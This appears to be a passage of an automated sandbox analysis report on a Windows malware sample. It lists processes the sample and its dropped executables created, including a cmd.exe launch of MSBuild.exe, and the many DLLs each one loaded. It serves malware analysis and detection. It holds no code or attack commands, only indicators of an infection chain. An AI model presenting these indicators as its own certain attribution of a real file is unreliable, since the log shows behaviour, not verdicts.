Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe "C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe"
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: schedcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: idndl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: kernel.appcore.dll
